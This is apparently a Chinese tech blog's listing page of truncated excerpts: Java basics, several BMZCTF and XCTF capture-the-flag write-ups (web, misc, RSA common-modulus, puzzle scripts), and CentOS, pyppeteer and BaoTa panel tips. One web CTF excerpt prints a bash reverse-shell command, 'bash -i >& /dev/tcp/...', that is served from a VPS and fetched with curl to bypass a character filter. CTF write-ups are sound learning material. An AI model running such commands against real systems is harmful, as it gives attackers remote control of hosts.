Java新手入门基础
2021年01月14日补2021年01月11日欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。新的改变我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:全新的界面设计 ,将会带来全新的写作体验;在创作中心设置你喜爱的代码高亮样式,Markdown 将代
流程控制——选择结构和循环结构
流程控制结构在Java中有3种流程控制结构:顺序结构、选择结构、循环结构。顺序结构顺序结构是指程序从上向下依次执行每条语句的结构,中间没有任何的判断和跳转。选择机构Java中有if语句和switch语句来实现选择结构。1、if语句if选择结构是根据条件判断之后再做处理,if语句共有3种不同的形式,分别为单分支结构、双分支结构和多分支结构。(1)if语句单分支结构语法格式:if ( 条件 ) {//语句}条件是布尔类型的表达式,运算结果为true和false。if语句的流程图
BMZCTF-Web WriteUp
Web 题hctf_2018_warmup打开后是一张图片。查看源码发现source.php访问,得到一串代码:<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
BMZCTF-MISC(一) WriteUp
文章目录MISC0x01 签到题0x02 2018 HEBTUCTF 签到题0x03 2018 HEBTUCTF 你可能需要一个wireshark2018 护网杯 迟来的签到题MISChttp://www.bmzclub.cn/challenges解密0x01 签到题关注公众号:白帽子社区,回复关键字:BMZCTF 获取flag0x02 2018 HEBTUCTF 签到题下载压缩包。是个名为zip的文件,没有后缀名。用010editor打开,看下文件头部:发现是个压缩包,添加后缀.zi
BMZCTF MISC(二)
SDNISC2020_RSA下载附件,为一个文本文件。其内容为可以得知:n,c1,e1,c2,e2。为典型的RSA的共模攻击。使用脚本:n = 0xa1d4d377001f1b8d5b2740514ce699b49dc8a02f12df9a960e80e2a6ee13b7a97d9f508721e3dd7a6842c24ab25ab87d1132358de7c6c4cee3fb3ec9b7fd873626bd0251d16912de1f0f1a2bba52b082339113ad1a262121d
BMZCTF Crypto
2018 HEBTUCTF Sudoku&Viginere下载附件,为一个doc文件,打开后发现是一个数独游戏,和一个密码。完成数独后:看数独表很像Viginere的密码表,根据45 34 57 74 15 35 26 86 47 39,在密码表上选取:密文 先横后竖 先竖后横45 r 134 r 557 y _74 5 115 5 t35
XCTF PUZZLE
PUZZLE下载附件是一张图片,可以正常打开但图片被分成一小片一小片的,而且随机摆放,但可以看出来,在原来的图片上写上了文件,猜测flag就应该是上面的文字。使用gaps对图片进行拼图。发现拼不出来。天空中的大字有flag、what’s、not、ing等,下面的花丛里有“{”。所以flag应该在在下的花丛里。只好手动拼接。用脚本将图片分割:import osfrom PIL import Imagedef splitimage(src, rownum, colnum, dstpath
2021 XCTF Guesskey
Guess key下载附件,是一段代码,分析如下:from random import randintimport osfrom flag import flagN=64key=randint(0,2**N) # 0到2的64次方中随机取一整数print keykey=bin(key)[2:].rjust(N,'0') # key取二进制,只取64位,左侧补0count=0while True: p=0 q=0 new_key='' zeros=[0] for j in r
BMZCTF WEB WEB_penetration
打开网页:发现过滤了很多字母和字符:b,d,e,-,q,f,g,i,p,j,+,k,m,n,<,>,o,w,x,~,:,^,@,&,,%,",*,(,),!,=,.,[,],},{,_);致使我们好多命令都无法操作。最后观察至curl没有被过滤。我们就可以设置好VPS,使用VPS反弹shell设置VPS的首页为:bash -c "bash -i >& /dev/tcp/IP地址/5555 0>&1"在VPS上打开web服务,如果没有ap.
【centos7+docker运行报错】当使用pyppeteer报出如下错误时pyppeteer.errors.BrowserError: Browser closed unexpectedly
参考:https://blog.csdn.net/qq_26870933/article/details/101288399原因:pyppeteer需要在没有沙盒arg的情况下运行【我在在docker上运行,为此必须使用--no-sandbox参数】解决办法:在middlewares.py中找到我们自定义的middlewares,并找到getbrowser方法,将self.browser = await pyppeteer.launch()改为self.browser = await .
宝塔面板忘记后台安全登陆地址找回方法【后台登录地址忘记了,如何在centos7使用命令找回】
参考:https://www.nx10.cn/codes/135.html/etc/init.d/bt default
centos 7 配置多个IP地址【独立服务器是否支持切换主ip,必须和服务商沟通,选择支持切换主ip的服务器即可】
参考:https://www.cnblogs.com/gyfluck/p/9952112.html默认IPADDR为主IPIPADDR="192.168.8.4"PREFIX="24"IPADDR1="192.168.8.5"PREFIX1="24"IPADDR2="192.168.8.6"PREFIX2="24"GATEWAY="192.168.8.1"
pyppeteer 报 Execution context was destroyed, most likely because of a navigation
参考:https://blog.csdn.net/lwdfzr/article/details/106471976
【pyppeteer】future: <Future finished exception=NetworkError(‘Protocol error (Target.detachFromTarge
参考:https://github.com/pyppeteer/pyppeteer/issues/89参考https://github.com/ranksense/url-inspector-automator/issues/1官方解决方案:https://github.com/miyakogi/pyppeteer/issues/194
【宝塔控制面板卸载】一键卸载宝塔Linux面板及运行环境命令
参考:https://blog.csdn.net/qq_37138818/article/details/81283151?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~first_rank_v2~rank_v25-1-81283151.nonecase&utm_term=linux%E4%B8%8B%E5%AE%9D%E5%A1%94%E6%8E%A7%E5%88%B6%E9%9D%A2%E6%9D%BF%E
今日推荐
周排行